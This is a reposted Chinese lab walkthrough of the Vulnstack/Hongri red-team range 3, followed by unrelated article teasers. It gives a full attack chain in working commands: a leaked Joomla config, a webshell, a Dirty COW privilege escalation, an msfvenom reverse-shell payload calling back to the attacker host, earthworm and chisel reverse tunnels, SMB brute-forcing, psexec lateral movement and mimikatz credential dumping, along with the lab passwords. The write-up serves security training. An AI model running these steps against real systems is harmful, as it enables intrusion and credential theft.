紅日靶場(三)——個人筆記

環境搭建

添加一張網卡(僅主機模式),192.168.93.0/24 網段

開啟centos,第一次運行,重啟網絡服務

service network restart

192.168.43.57/24(外網ip)
192.168.93.100/24(內網ip)
image.png

其他四臺主機均為單網卡機器,將 kali 主機設置為橋接網卡

外網探測

已知外網網段:192.168.43.0/24
發現主機,使用nmap進行簡單的ping掃描

┌──(root?nuli)-[/home/nuli/Desktop]
└─# nmap -sn 192.168.43.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 19:27 CST
Nmap scan report for 192.168.43.1
Host is up (0.011s latency).
MAC Address: 9E:07:2D:1A:6F:11 (Unknown)
Nmap scan report for 192.168.43.57
Host is up (0.00057s latency).
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap scan report for 192.168.43.58
Host is up (0.00020s latency).
MAC Address: 60:45:2E:C2:AE:57 (Unknown)
Nmap scan report for nuli (192.168.43.191)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds

發現57,58倆臺存活主機
進行簡單端口掃描

nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.57
nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.58

結果:

┌──(root?nuli)-[/home/nuli/Desktop]
└─# nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 19:31 CST
Nmap scan report for 192.168.43.57
Host is up (0.0018s latency).PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
22/tcp   open   ssh           OpenSSH 5.3 (protocol 2.0)
80/tcp   open   http          nginx 1.9.4
88/tcp   closed kerberos-sec
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
389/tcp  closed ldap
443/tcp  closed https
445/tcp  closed microsoft-ds
636/tcp  closed ldapssl
1433/tcp closed ms-sql-s
3306/tcp open   mysql         MySQL 5.7.27-0ubuntu0.16.04.1
3389/tcp closed ms-wbt-server
5985/tcp closed wsman
6379/tcp closed redis
MAC Address: 00:0C:29:32:46:C9 (VMware)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds
┌──(root?nuli)-[/home/nuli/Desktop]
└─# nmap -sV -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379 192.168.43.58Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-19 19:31 CST
Nmap scan report for nuli (192.168.43.58)
Host is up (0.000085s latency).PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   closed http
88/tcp   closed kerberos-sec
135/tcp  open   msrpc         Microsoft Windows RPC
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  closed ldap
443/tcp  closed https
445/tcp  open   microsoft-ds?
636/tcp  closed ldapssl
1433/tcp closed ms-sql-s
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5985/tcp closed wsman
6379/tcp closed redis
MAC Address: 60:45:2E:C2:AE:57 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.44 seconds

總結:

開放端口
192.168.43.57:
22端口:ssh登錄,爆破密碼
80端口:web網頁
3306端口:mysql,嘗試弱口令192.168.43.58:
135端口:msrpc服務
139端口:netbios-ssn服務,文件和打印機共享
445端口:microsoft-ds,SMB協議

wapplayzer查看:Joomla系統
image.png

看到登錄框(果斷嘗試弱口令)

沒成功,可能是字典問題

CMS漏洞掃描

CMS為joomla
使用Joomscan工具掃描:未發現漏洞
image.png
Joomla3.9.12

目錄掃描:信息泄露,連接數據庫

dirsearch掃目錄

image.png

robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtmlUser-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

192.168.43.57/configuration.php~存在信息泄露
image.png

泄露數據庫賬號密碼,也許3306端口可以利用上
public $dbtype = 'mysqli'; 
public $host = 'localhost'; 
public $user = 'testuser'; 
public $password = 'cvcvgjASD!@'; 
public $db = 'joomla';

嘗試連接數據庫
image.png

數據庫添加管理員,登錄后臺

官方文檔中有修改密碼的方法:
J1.5:如何恢復或重置您的管理員密碼?- Joomla! 文檔

但這里無法修改,于是可以新建超級管理員賬戶
image.png
image.png

成功登錄
image.png

上傳木馬,蟻劍連接

隨便瀏覽,發現模板處可以上傳文件
image.png
外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳
image.png

繞過disable_functions

image.png

設置了disable_functions
蟻鍵插件自帶繞過disable_functions的插件
image.png

ssh連接

執行uname -a
nginx反代,實際后端為ubuntu服務器
image.png

在www-data:/tmp/mysql/test.txt中有賬號密碼,可以嘗試ssh連接

adduser wwwuser
passwd wwwuser_123Aqx

ubuntu的ip為192.168.93.120
centos的ip為192.168.93.100

提權

這里首先查看具有root權限的suid可執行文件

find / -perm -4000 2>/dev/null
常見root權限文件nmap
vim
find
bash
more
less
nano
cp

image.png
無法利用

使用臟牛提權:
exp地址:https://github.com/FireFart/dirtycow
上傳到可讀可寫的文件夾:如/tmp

編譯EXP:

gcc -pthread dirty.c -o dirty –lcrypt

生成root權限的用戶:./dirty 123

查看/etc/passwd

成功創建一個toor超級用戶
image.png
提權成功:
image.png

內網探測

嘗試reGeorg+Proxchains實現內網穿透(失敗)

網站根目錄上傳tunnel.nosocket.php
image.png

image.png

image.png

但是這里防火墻限制或者是函數限制,建立隧道失敗
image.png

上線msf馬(要注意系統版本,這是x86)

生成木馬:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.191 LPORT=9999 -f elf > a.elf

msf監聽端口:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.43.191
set LPORT 9999
exploit
執行msf馬:
chmod +x a.elf
./a.elf

image.png

獲取完整shell

python -c 'import pty;pty.spawn("/bin/bash")'

image.png

內網信息收集

內網網段:192.168.93.0/24

查看內網網段(這里從之前獲取到的信息也能看到):內網網段:192.168.93.0/24
image.png

添加路由(這里我用msf掃不到,后面使用內網穿透)
掛起會話,ctrl+z(掛起后使用命令jobs可以查看掛起的進程,使用命令fg %掛起進程號(例:fg %1)可以恢復msf可以使用bg掛起會話,sessions查詢會話。恢復會話使用sessions -i ID

拿到meterpreter,掛起會話,添加路由
image.png

use multi/manage/autoroute
sessions  # 查詢會話id
route add 192.168.93.0 255.255.255.0 1 #1是會話id

image.png

內網穿透
使用earthworm搭建socks5反向代理(掃描速度太慢)
攻擊機:
./ew_for_linux64 -s rcsocks -l 1080 -e 1234靶機:
./ew_for_linux64 -s rssocks -d 192.168.43.191 -e 1234

image.png

image.png

編輯/etc/proxychains.conf文件,將sock5指向127.0.0.1:1080
image.png

使用chisel搭建隧道

攻擊機配置:

./chisel server -p 8080 --reverse-p 8080:指定服務端監聽端口
--reverse:允許反向代理

客戶端配置:

./chisel client 192.168.43.191:8080 R:1080:socks

隧道搭建成功,和earthworm沒什么區別

內網信息收集(使用上傳fscan掃描)

上傳fscan工具

./fscan_amd64_1.6 -h 192.168.93.0/24
(icmp) Target '192.168.93.100' is alive(centos)
(icmp) Target '192.168.93.120' is alive(ubuntu)
(icmp) Target '192.168.93.1' is alive
(icmp) Target '192.168.93.20' is alive(win2008)
(icmp) Target '192.168.93.10' is alive(DC域控)
(icmp) Target '192.168.93.30' is alive(win7)
./fscan_amd64_1.6 -h 192.168.93.0/24 -np -nopoc -p 21,22,80,88,135,139,389,443,445,636,1433,3306,3389,5985,6379

DC域控

192.168.93.10:389 open 
192.168.93.10:139 open 
192.168.93.10:88 open 
192.168.93.10:53 open 
192.168.93.10:445 open 
192.168.93.10:464 open 
192.168.93.10:593 open 
192.168.93.10:135 open

win2008

192.168.93.20:139 open
192.168.93.20:80 open
192.168.93.20:135 open
192.168.93.20:139 open
192.168.93.20:445 open
192.168.93.20:1433 open

win7

192.168.93.30:135 open
192.168.93.30:139 open
192.168.93.30:445 open

centos

192.168.93.100:22 open
192.168.93.100:80 open
192.168.93.100:3306 open

ubuntu

192.168.93.120:22 open
192.168.93.120:3306 open
192.168.93.120:80 open

分析:

弱口令:
mysql:192.168.93.120:3306:root 123 [+] mysql:192.168.93.100:3306:root 123windows遠程管理:
192.168.93.10(域控)開放 5985 端口win主機均開放445端口,嘗試永恒之藍漏洞

永恒之藍測試

use auxiliary/scanner/smb/smb_ms17_010
set RHOST 192.168.93.10
run

三臺主機均不存在永恒之藍漏洞

msf post(multi/manage/autoroute) > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.93.10
RHOST => 192.168.93.10
msf auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.93.10:445     - Host does NOT appear vulnerable.
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.21/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 192.168.93.10:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.93.20
RHOST => 192.168.93.20
msf auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.93.20:445     - Host does NOT appear vulnerable.
[*] 192.168.93.20:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.93.30
RHOST => 192.168.93.30
msf auxiliary(scanner/smb/smb_ms17_010) > run
[-] 192.168.93.30:445     - Host does NOT appear vulnerable.
[*] 192.168.93.30:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

MSSQL密碼爆破-命令執行

Win2008開放1433端口

1433端口用于SQL Server對外提供服務
use auxiliary/scanner/mssql/mssql_login
show options
set RHOSTS 192.168.93.20
run

這里數據庫的賬號密碼就是之前得到的:testuser/cvcvgjASD!@

通過Metasploit的mssql_exec運行cmd命令

use auxiliary/admin/mssql/mssql_exec
show options
set CMD 'ipconfig'
set RHOST 192.168.93.20
set PASSWORD 123456
run

命令無法執行

SMB密碼爆破

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.93.10
set PASS_FILE ~/pass.txt
set SMBUser administrator
exploit

image.png

Win7密碼為123qwe!ASD

爆破后Win2008密碼也為:123qwe!ASD

DC并沒有爆破出來

SMB橫向

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator 
set smbpass 123qwe!ASD
run

這里win7的4444端口并沒有被占用,但是SMB連不上,而Win2008可以拿到meterpreter

image.png
之后用反向連接拿到Win7的shell

msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.93.130
lhost => 192.168.93.130
msf exploit(windows/smb/psexec) > run

這里進程不穩定,使用進程遷移到穩定的進程

可以看到已經拿到SYSTEM權限
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

進程遷移:

getpid  #獲取當前pid
#選擇一個穩定的進程:`explorer.exe`、`svchost.exe`、`winlogon.exe`
ps    #查看進程
migrate PID
meterpreter > ps |grep explorer
Filtering on 'explorer'
No matching processes were found.
meterpreter > 
meterpreter > migrate 220
[*] Migrating from 344 to 220...
[*] Migration completed successfully.

看到域內有三臺主機

meterpreter > shell
Process 1276 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6003]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.C:\Windows\system32>net view
net view
Server Name            Remark-------------------------------------------------------------------------------
\\WIN-8GA56TNV3MV                                                              
\\WIN2008                                                                      
\\WIN7                                                                         
The command completed successfully.

拿到域控

通過upload命令上傳mimikatz

meterpreter > upload ~/tools/mimikatz/mimikatz.exe C:\\Windows\\temp\\ [*] Uploading : /root/tools/mimikatz/mimikatz.exe -> C:\Windows\temp\mimikatz.exe [*] Completed : /root/tools/mimikatz/mimikatz.exe -> C:\Windows\temp\mimikatz.exe
C:\Windows\Temp>ipconfig /all
ipconfig /allWindows IP ConfigurationHost Name . . . . . . . . . . . . : win2008Primary Dns Suffix  . . . . . . . : test.orgNode Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoDNS Suffix Search List. . . . . . : test.org
sekurlsa::logonpasswords

獲取到域控的密碼:zxcASDqw123!!
但是smb無法連接

msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > set rhost 192.168.93.10
rhost => 192.168.93.10
msf exploit(windows/smb/psexec) > set smbuser administrator 
smbuser => administrator
msf exploit(windows/smb/psexec) > set smbpasswd zxcASDqw123!!
[!] Unknown datastore option: smbpasswd. Did you mean SMBPass?
smbpasswd => zxcASDqw123!!
msf exploit(windows/smb/psexec) > set smbpass zxcASDqw123!!
smbpass => zxcASDqw123!!
msf exploit(windows/smb/psexec) > run
[*] 192.168.93.10:445 - Connecting to the server...
[*] 192.168.93.10:445 - Authenticating to 192.168.93.10:445 as user 'administrator'...
[*] 192.168.93.10:445 - Selecting PowerShell target
[*] 192.168.93.10:445 - Executing the payload...
[+] 192.168.93.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.10:8080
[*] Exploit completed, but no session was created.

反向連接拿到meterpreter

msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.93.130
lhost => 192.168.93.130
msf exploit(windows/smb/psexec) > run

image.png

拿到域控,至此,滲透結束!
image.png

總結:

基本信息收集,遠程連接數據庫,木馬連接,繞過disable_functions,提權,內網穿透(reGeorg,earthworm),msf上線木馬,msf添加路由,內網信息收集,1433端口MSSQL密碼爆破+命令執行,445端口SMB密碼爆破,使用psexec通過正向連接、反向連接獲取shell,進程遷移,橫向移動

參考資料:
紅日靶機(三)筆記 - LingX5 - 博客園
Vlunstack ATT&CK實戰系列——紅隊實戰(三)Writeup-先知社區
ATT&CK紅隊評估(紅日靶場三) - FreeBuf網絡安全行業門戶

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/96573.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/96573.shtml
英文地址,請注明出處:http://en.pswp.cn/web/96573.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

車載網關框架 --- 車內網關IP轉CAN鏈路解析 done

我是穿拖鞋的漢子,魔都中堅持長期主義的汽車電子工程師。 老規矩,分享一段喜歡的文字,避免自己成為高知識低文化的工程師: 做到欲望極簡,了解自己的真實欲望,不受外在潮流的影響,不盲從,不跟風。把自己的精力全部用在自己。一是去掉多余,凡事找規律,基礎是誠信;二是…

lvgl修改輸入設備驅動使其支持鼠標右鍵、雙擊、滑輪...

我在前幾章移植 lvgl 到linux上時講過注冊鼠標驅動部分,那時候使用的時默認提供的驅動,支持的鼠標功能很少,只有左鍵點擊,那時候我提過我們可以修改驅動使其支持,下面是具體的實現。看上面代碼,我們當時是直…

SpringBoot 中單獨一個類中運行main方法報錯:找不到或無法加載主類

1. 報錯SpringBoot項目,在隨機某個類使用main方法,點擊運行/調試報錯錯誤: 找不到或無法加載主類 com.central.workorder.config.PropertyEncrypt 原因: java.lang.ClassNotFoundException: com.central.workorder.config.PropertyEncrypt2. 原因縮短命令…

React 核心 Hook 與冷門技巧:useReducer、useEffect、useRef 及 is 屬性全解析

📚 前言React 的函數組件 Hooks 模式已經成為現代前端開發的主流。相比類組件,Hooks 讓狀態管理和副作用處理更加簡潔和可復用。但在實際開發中,除了常用的 useState 和 useEffect,還有很多“進階武器”值得我們掌握。本文將深入…

通義靈碼產品演示: 數據庫設計與數據分析

作者:了哥 演示主題:AI 進行數據庫設計以及做數據分析 演示目的 演示通義靈碼對于數據庫的設計能力以及數據分析能力。 演示準備 準備數據庫,這里為了簡單實用 sqlite3 brew install sqlite3使用 vscode,同時安裝好通義靈碼的插件…

MySQL主從同步參數調優案例

#作者:stackofumbrella 文章目錄一、前言二、故障概述2.1 基礎信息2.2 故障現象描述三、故障診斷分析3.1 排查過程3.2 問題根因四、故障解決方案 📊4.1 解決方案 🛠?五、總結附件一、前言 在磐基系統中大量使用MySQL作為后端的數據存儲&…

【代碼隨想錄算法訓練營——Day10】棧與隊列——232.用棧實現隊列、225.用隊列實現棧、20.有效的括號、1047.刪除字符串中的所有相鄰重復項

LeetCode題目鏈接 https://leetcode.cn/problems/implement-queue-using-stacks/ https://leetcode.cn/problems/implement-stack-using-queues/description/ https://leetcode.cn/problems/valid-parentheses/description/ https://leetcode.cn/problems/remove-all-adjacent-…

Asp .Net Core 系列:Asp .Net Core 集成 Hangfire+MySQL

在 .NET 或 .NET Core 應用中,若需在不依賴 Windows 服務、獨立進程的前提下實現后臺處理,Hangfire 是最成熟、簡單的方案之一 —— 它可直接嵌入現有應用(如 ASP.NET Core Web 應用),無需額外部署,同時提供…

網站漏洞掃描要怎么處理?

在網絡安全領域,網站漏洞是黑客攻擊的重要突破口,而網站漏洞掃描能及時發現這些隱患。但很多小白在完成漏洞掃描后,不清楚后續該如何處理,導致漏洞一直存在,給網站安全埋下風險。下面從準備工作、處理步驟、驗證維護等…

淘寶RecGPT:通過LLM增強推薦

導論背景 (Background)??推薦系統的核心挑戰??:怎么 準確推斷 用戶行為背后快速變化的真實意圖,以實現用戶、商戶和平臺的三贏。??現有方法的局限性??:傳統的基于歷史日志共現模式(“從點擊學習點擊”)的模型&…

【Go系統編程】07 網絡化IPC:Go的王牌——Socket編程

大家好,我是Tony Bai。歡迎來到我們《Go 系統編程》專欄的最后一講。在過去的旅程中,我們探索了管道、消息隊列、共享內存等一系列強大的 IPC 機制。它們各有所長,但都有一個共同的、致命的局限性:它們都只能在同一臺物理機上工作…

claude code使用小竅門

視頻地址 B站 1 /init 在項目最開始的時候,使用/init可以將項目通讀一遍。cc會將學習到的關于項目的知識都保存到CLAUD.MD文件中 2、 /compact 用來壓縮對話的上下文,claude會將之前的一些亂七八糟或者重復的對話刪除壓縮,有利于提高AI的…

The learning process of Decision Tree Model|決策樹模型學習過程

----------------------------------------------------------------------------------------------- 這是我在我的網站中截取的文章,有更多的文章歡迎來訪問我自己的博客網站rn.berlinlian.cn,這里還有很多有關計算機的知識,歡迎進行留言或…

期貨盤后空開是認購期權行權?

本文主要介紹期貨盤后空開是認購期權行權?期貨盤后空開與認購期權行權是兩個獨立的概念,無直接關聯,需從交易機制、操作邏輯及市場規則三方面區分。期貨盤后空開是認購期權行權?1. 定義與交易屬性期貨盤后空開:屬于期貨…

ESP32 I2S音頻總線學習筆記(七):制作一個錄音播放器

簡介 上一篇我們利用I2S輸出DIY了一個藍牙音箱簡單玩了一下,本篇我們繼續來看代碼。前面幾篇文章我們分別介紹了I2S輸入,I2S輸出,以及WAV文件格式的相關內容,那我們就可以根據所學到的,制作一個錄音機,具體…

PyTorch 動態圖的靈活性與實用技巧

PyTorch 以其動態計算圖(Dynamic Computation Graph)而聞名,這賦予了它極高的靈活性和易用性,使其在研究和實際應用中都備受青睞。與TensorFlow 1.x的靜態圖(需要先定義圖結構,再運行)不同&…

#C語言——刷題攻略:牛客編程入門訓練(十一):攻克 循環控制(三),輕松拿捏!

🌟菜鳥主頁:晨非辰的主頁 👀學習專欄:《C語言刷題合集》 💪學習階段:C語言方向初學者 ?名言欣賞:"代碼行數決定你的下限,算法思維決定你的上限。" 前言:在學習…

復雜PDF文檔結構化提取全攻略——從OCR到大模型知識庫構建

在學術研究、金融分析、法律合同、工程設計等眾多領域,PDF文檔已成為信息存儲與傳遞的重要載體。然而,面對包含復雜表格、公式、圖表、手寫批注、多欄排版等元素的PDF,傳統工具往往難以準確、完整地提取內容。這不僅影響信息利用效率&#xf…

HttpClient、OkHttp 和 WebClient

HttpClient、OkHttp 和 WebClient 是 Java 生態中常見的 HTTP 客戶端,它們在設計理念、異步能力、性能等方面有所不同。以下是它們的詳細對比:1. 概述客戶端介紹Apache HttpClient傳統同步 HTTP 客戶端,功能豐富,歷史悠久&#xf…

書籍成長書籍文字#創業付費雜志《財新周刊》2025最新合集 更33期

免費訪問地址 https://isharehubs.com/article/2025-33-26c27ee5bb9180cdafc5efbec9545ac5 資源信息 付費雜志《財新周刊》2025最新合集 更33期 《財新周刊》2025 最新合集(更至 33 期)重磅上線,聚焦年度熱點與結構性變化,從監…